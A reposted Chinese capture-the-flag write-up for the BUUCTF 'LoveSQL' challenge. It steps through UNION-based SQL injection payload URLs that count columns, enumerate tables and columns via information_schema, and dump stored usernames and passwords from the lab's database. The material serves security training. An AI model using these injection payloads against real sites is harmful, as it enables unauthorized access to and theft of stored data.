BUUCTF[极客大挑战2019]LoveSQL

Posted 热绪

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了BUUCTF[极客大挑战2019]LoveSQL相关的知识,希望对你有一定的参考价值。

使用单引号闭合发现:

直接上万能密码:

给了密码,95722b3a2cae53b2ada1c9146ab0bc2a 是加密的,并不能直接登录。

我们继续进行注入:

使用payload:

http://8fd46e77-db9a-4e40-89ea-cd74a23c078e.node3.buuoj.cn/check.php?username=admin' order by 4%23&password=123
#这里使用 %23 是因为我们是在url中输入的,所以需要输入 # 的url编码:%23

http://8fd46e77-db9a-4e40-89ea-cd74a23c078e.node3.buuoj.cn/check.php?username=admin' order by 3%23&password=123

字段数:3

我们输入payload查看回显点位在哪里:

http://8fd46e77-db9a-4e40-89ea-cd74a23c078e.node3.buuoj.cn/check.php?username=1' union select 1,2,3 %23&password=123

 

注入点位在2,3;那就简单了。

查询数据库名和版本:

http://8fd46e77-db9a-4e40-89ea-cd74a23c078e.node3.buuoj.cn/check.php?username=1' union select 1,database(),version()%23&password=1

查询表名:

http://8fd46e77-db9a-4e40-89ea-cd74a23c078e.node3.buuoj.cn/check.php?username=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = 'geek'%23&password=1

查询 l0ve1ysq1 表的字段名:

http://8fd46e77-db9a-4e40-89ea-cd74a23c078e.node3.buuoj.cn/check.php?username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema = 'geek' and table_name = 'l0ve1ysq1'%23&password=1

查询字段:

http://8fd46e77-db9a-4e40-89ea-cd74a23c078e.node3.buuoj.cn/check.php?username=1' union select 1,2,group_concat(id,username,password)from l0ve1ysq1 %23&password=1

flag在最后!

以上是关于BUUCTF[极客大挑战2019]LoveSQL的主要内容,如果未能解决你的问题,请参考以下文章

buuctf 极客大挑战 lovesql

[极客大挑战 2019]LoveSQL

[极客大挑战 2019]LoveSQL

[极客大挑战 2019]LoveSQL

[极客大挑战 2019]LoveSQL 1(SQL注入)

[极客大挑战 2019]LoveSQL